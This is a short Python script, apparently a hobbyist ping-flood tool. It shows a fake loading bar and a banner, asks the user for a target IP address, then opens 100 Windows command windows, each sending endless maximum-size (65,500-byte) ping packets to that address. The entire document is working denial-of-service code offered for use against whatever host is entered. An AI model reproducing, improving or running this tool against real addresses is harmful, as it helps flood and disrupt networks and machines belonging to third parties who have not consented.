import os, time from colorama import Fore, Back, Style, init import subprocess init() os.system("cls") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading []") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [=]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [==]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [===]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [====]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [=====]") time.sleep(2) print(Fore.GREEN + "Loaded!") time.sleep(1) os.system("cls") title = """ _____ _ | __ \ | | | |__) | __ ___ | |__ | ___/ '__/ _ \| '_ \ | | | | | (_) | |_) | |_| |_| \___/|_.__/ Ping a spefic ip every second (65.500 mb) """ print(Fore.RED + Fore.YELLOW + title) print("_________________________________") ipinput = input(Fore.GREEN + "Put in ip: ") print(Fore.RED + Fore.YELLOW + "_________________________________") ip = ipinput bytess = "65500" for _ in range(100): subprocess.Popen(["start", "cmd", "/k", f"ping -l {bytess} {ip} -t"], shell=True) time.sleep(4)